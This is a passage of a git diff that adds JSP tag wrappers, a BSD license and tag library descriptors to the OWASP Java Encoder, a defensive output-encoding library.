SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag that performs percent-encoding for a component of a URI, such as a query + * parameter name or value, path, or query-string. + * This wraps the {@link org.owasp.encoder.Encode#forUriComponent(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForUriComponentTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forUriComponent(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java new file mode 100644 index 0000000..9b975f5 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform percent-encoding of a URL according to RFC 3986. + * This wraps the {@link org.owasp.encoder.Encode#forUri(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForUriTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forUri(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java new file mode 100644 index 0000000..e2820d9 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform XML Attribute Encoding. + * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForXmlAttributeTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forXmlAttribute(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java new file mode 100644 index 0000000..fd3e0d5 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform XML Comment Encoding. + * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForXmlCommentTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forXmlComment(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java new file mode 100644 index 0000000..c5540ef --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform XML Content Encoding. + * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForXmlContentTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forXmlContent(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java new file mode 100644 index 0000000..ea9ebea --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform XML Encoding. + * This wraps the {@link org.owasp.encoder.Encode#forXml(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForXmlTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forXml(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/resources/META-INF/LICENSE b/jsp/src/main/resources/META-INF/LICENSE new file mode 100644 index 0000000..f66c375 --- /dev/null +++ b/jsp/src/main/resources/META-INF/LICENSE @@ -0,0 +1,33 @@ +Copyright (c) 2015 Jeff Ichnowski +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions +are met: + + * Redistributions of source code must retain the above + copyright notice, this list of conditions and the following + disclaimer. + + * Redistributions in binary form must reproduce the above + copyright notice, this list of conditions and the following + disclaimer in the documentation and/or other materials + provided with the distribution. + + * Neither the name of the OWASP nor the names of its + contributors may be used to endorse or promote products + derived from this software without specific prior written + permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +OF THE POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file diff --git a/jsp/src/main/resources/META-INF/java-encoder-advanced.tld b/jsp/src/main/resources/META-INF/java-encoder-advanced.tld new file mode 100644 index 0000000..becab48 --- /dev/null +++ b/jsp/src/main/resources/META-INF/java-encoder-advanced.tld @@ -0,0 +1,560 @@ + + + OWASP Java Encoder Project + 1.0 + java-encoder + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#advanced + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. + + forCDATA + forCDATA + org.owasp.encoder.tag.ForCDATATag + empty + + The value to be written out + value + true + true + java.lang.String + + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.tag.ForHtmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.tag.ForXmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.tag.ForXmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + Since this performs additional encoding so it can work in all + of the JavaScript contexts listed, it may be slightly less + efficient then using one of the methods targetted to a specific + JavaScript context: forJavaScriptAttribute, + forJavaScriptBlock, or forJavaScriptSource. + + Unless you are interested in saving a few bytes of output or + are writing a framework on top of this library, it is recommend + that you use this method over the others. + + forJavaScript + forJavaScript + org.owasp.encoder.tag.ForJavaScriptTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + This method encodes for JavaScript strings contained within + HTML script attributes (such as onclick). It is + NOT safe for use in script blocks. The caller MUST provide the + surrounding quotation characters. This method performs the + same encode as Encode.forJavaScript(String) with the + exception that / is not escaped. + + forJavaScriptAttribute + forJavaScriptAttribute + org.owasp.encoder.tag.ForJavaScriptAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + This method encodes for JavaScript strings contained within + HTML script blocks. It is NOT safe for use in script + attributes (such as onclick). The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String)} with + the exception that " and ' are encoded as \" and \' respectively. + + forJavaScriptBlock + forJavaScriptBlock + org.owasp.encoder.tag.ForJavaScriptBlockTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + This method encodes for JavaScript strings contained within + a JavaScript or JSON file. This method is NOT safe for + use in ANY context embedded in HTML. The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String) with + the exception that / and & are not escaped and " and ' are + encoded as \" and \' respectively. + + forJavaScriptSource + forJavaScriptSource + org.owasp.encoder.tag.ForJavaScriptSourceTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.tag.ForHtmlUnquotedAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. + + forUri + forUri + org.owasp.encoder.tag.ForUriTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.tag.ForCssUrlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encoder for XML comments. NOT FOR USE WITH (X)HTML CONTEXTS. + (X)HTML comments may be interpreted by browsers as something + other than a comment, typically in vendor specific extensions + (e.g. &lt;--if[IE]--&gt;. + For (X)HTML it is recommend that unsafe content never be included + in a comment. + + forXmlComment + forXmlComment + org.owasp.encoder.tag.ForXmlCommentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for HTML text attributes. + forHtmlAttribute + forHtmlAttribute + org.owasp.encoder.tag.ForHtmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.tag.ForHtmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.tag.ForXmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.tag.ForUriComponentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.tag.ForCssStringTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.Encode + java.lang.String forHtml(java.lang.String) + forHtml(unsafeData) + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.Encode + java.lang.String forHtmlContent(java.lang.String) + forHtmlContent(unsafeData) + + + Encodes for HTML text attributes. + forHtmlAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlAttribute(java.lang.String) + forHtmlAttribute(unsafeData) + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlUnquotedAttribute(java.lang.String) + forHtmlUnquotedAttribute(unsafeData) + + + + Encodes for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.Encode + java.lang.String forCssString(java.lang.String) + forCssString(unsafeData) + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.Encode + java.lang.String forCssUrl(java.lang.String) + forCssUrl(unsafeData) + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. + + forUri + forUri + org.owasp.encoder.Encode + java.lang.String forUri(java.lang.String) + forUri(unsafeData) + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.Encode + java.lang.String forUriComponent(java.lang.String) + forUriComponent(unsafeData) + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.Encode + java.lang.String forXml(java.lang.String) + forXml(unsafeData) + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.Encode + java.lang.String forXmlContent(java.lang.String) + forXmlContent(unsafeData) + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.Encode + java.lang.String forXmlAttribute(java.lang.String) + forXmlAttribute(unsafeData) + + + + Encoder for XML comments. NOT FOR USE WITH (X)HTML CONTEXTS. + (X)HTML comments may be interpreted by browsers as something + other than a comment, typically in vendor specific extensions + (e.g. &lt;--if[IE]--&gt;. + For (X)HTML it is recommend that unsafe content never be included + in a comment. + + forXmlComment + org.owasp.encoder.Encode + java.lang.String forXmlComment(java.lang.String) + forXmlComment(unsafeData) + + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. + + forCDATA + forCDATA + org.owasp.encoder.Encode + java.lang.String forCDATA(java.lang.String) + forCDATA(unsafeData) + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + Since this performs additional encoding so it can work in all + of the JavaScript contexts listed, it may be slightly less + efficient then using one of the methods targetted to a specific + JavaScript context: forJavaScriptAttribute, + forJavaScriptBlock, or forJavaScriptSource. + + Unless you are interested in saving a few bytes of output or + are writing a framework on top of this library, it is recommend + that you use this method over the others. + + forJavaScript + forJavaScript + org.owasp.encoder.Encode + java.lang.String forJavaScript(java.lang.String) + forJavaScript(unsafeData) + + + + This method encodes for JavaScript strings contained within + HTML script attributes (such as onclick). It is + NOT safe for use in script blocks. The caller MUST provide the + surrounding quotation characters. This method performs the + same encode as Encode.forJavaScript(String) with the + exception that / is not escaped. + + forJavaScriptAttribute + forJavaScriptAttribute + org.owasp.encoder.Encode + java.lang.String forJavaScriptAttribute(java.lang.String) + forJavaScriptAttribute(unsafeData) + + + + This method encodes for JavaScript strings contained within + HTML script blocks. It is NOT safe for use in script + attributes (such as onclick). The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String)} with + the exception that " and ' are encoded as \" and \' respectively. + + forJavaScriptBlock + forJavaScriptBlock + org.owasp.encoder.Encode + java.lang.String forJavaScriptBlock(java.lang.String) + forJavaScriptBlock(unsafeData) + + + + This method encodes for JavaScript strings contained within + a JavaScript or JSON file. This method is NOT safe for + use in ANY context embedded in HTML. The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String) with + the exception that / and & are not escaped and " and ' are + encoded as \" and \' respectively. + + forJavaScriptSource + forJavaScriptSource + org.owasp.encoder.Encode + java.lang.String forJavaScriptSource(java.lang.String) + + <%@page contentType="text/javascript; charset=UTF-8"%> + var data = '${forJavaScriptSource(unsafeData)}'; + + + \ No newline at end of file diff --git a/jsp/src/main/resources/META-INF/java-encoder.tld b/jsp/src/main/resources/META-INF/java-encoder.tld new file mode 100644 index 0000000..b761de0 --- /dev/null +++ b/jsp/src/main/resources/META-INF/java-encoder.tld @@ -0,0 +1,403 @@ + + + OWASP Java Encoder Project + 1.0 + java-encoder + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. + + forCDATA + forCDATA + org.owasp.encoder.tag.ForCDATATag + empty + + The value to be written out + value + true + true + java.lang.String + + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.tag.ForHtmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.tag.ForXmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.tag.ForXmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + Since this performs additional encoding so it can work in all + of the JavaScript contexts listed, it may be slightly less + efficient then using one of the methods targetted to a specific + JavaScript context: forJavaScriptAttribute, + forJavaScriptBlock, or forJavaScriptSource. + + Unless you are interested in saving a few bytes of output or + are writing a framework on top of this library, it is recommend + that you use this method over the others. + + forJavaScript + forJavaScript + org.owasp.encoder.tag.ForJavaScriptTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.tag.ForHtmlUnquotedAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. + + forUri + forUri + org.owasp.encoder.tag.ForUriTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.tag.ForCssUrlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for HTML text attributes. + forHtmlAttribute + forHtmlAttribute + org.owasp.encoder.tag.ForHtmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.tag.ForHtmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.tag.ForXmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.tag.ForUriComponentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.tag.ForCssStringTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.Encode + java.lang.String forHtml(java.lang.String) + forHtml(unsafeData) + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.Encode + java.lang.String forHtmlContent(java.lang.String) + forHtmlContent(unsafeData) + + + Encodes for HTML text attributes. + forHtmlAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlAttribute(java.lang.String) + forHtmlAttribute(unsafeData) + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlUnquotedAttribute(java.lang.String) + forHtmlUnquotedAttribute(unsafeData) + + + + Encodes 